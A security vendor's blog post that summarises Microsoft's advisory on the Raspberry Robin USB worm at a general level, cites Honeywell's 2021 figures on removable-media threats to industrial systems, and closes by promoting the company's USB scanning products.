A worm labelled Raspberry Robin has infected hundreds of Windows networks, as revealed by a private threat intelligence advisory from Microsoft.
The worm is reportedly being transmitted to networks via USB devices. To spread, the worm requires users to insert their USB device and then click a malicious .LNK file. After a user has done this, the worm can then use the Windows command prompt to launch a misexec process and run a malicious file also present on the USB device.
A connection is then established with a command and control server using a short URL, and if successful, a number of malicious DLLs are downloaded and installed. The legitimate Windows utility odbcconf.exe is then used to execute the DLLs whilst the worm repeatedly attempts to connect to Tor network nodes. At least some of the command and control servers being used are thought to be infected QNAP NAS devices.
Another disconcerting part of this story is that whoever successfully deployed Raspberry Robin has yet to make use of the infected Windows networks. The malware introduced by the worm is capable of bypassing Windows User Account Control (UAC) and has already proven it can use the utilities available to the OS. So, while nobody currently knows the goal of Raspberry Robin, the control it imposes over a network means new malware could be downloaded and deployed very quickly.
Microsoft has flagged Raspberry Robin as a high-risk campaign with good reason, and for now, there doesn't seem to be any mitigation process beyond not plugging suspicious USB devices into a Windows network. However, businesses where USB devices are a necessity, for example, those that require USBs to make changes and updates to their networks, may not be able to mitigate the risk of spreading Raspberry Robin and other malicious content from USBs to the network.
Further illustrating the continued threat of removable media, particularly to industrial control systems, is Honeywell’s 2021 Industrial Cybersecurity USB Threat Report. Data was collected from organizations in oil and gas, energy, chemical, water, aerospace and other sectors, across more than 60 countries in the Americas, Europe and Asia.
The report found that 37% of threats are specifically designed to utilize removable media. Compared to 19% in their 2020 report, this marks an increase of 18%. The report also found that 79% of all cyber threats originating from removable media can lead to critical business disruption in OT environments. In particular, 30% of all USB-based threats are designed solely for industrial use or associated with industrial cyber-attack campaigns.
A modest 9% have the sole purpose of installing additional payloads, and over 50% are designed to establish a permanent backdoor or remote access. According to the new data, a 30% increase was also noticed in using USB devices in manufacturing facilities last year, showcasing OT’s growing reliance on removable media technology.
SolutionsPT provides a range of removable media protection solutions which scan and sanitize your devices prior to them being plugged into your network. Our solutions can block unscanned devices from connecting to your environment and can also detect zero-day and unknown threats that may be present on your removable media. This helps in meeting policies, regulations and standards surrounding removable media use within OT and at the same time ensures removable media will not cause a cyber incident and negatively impact your operations.
For more information on how we can help your organisation with removable media protection and wider OT cyber security issues, please click below.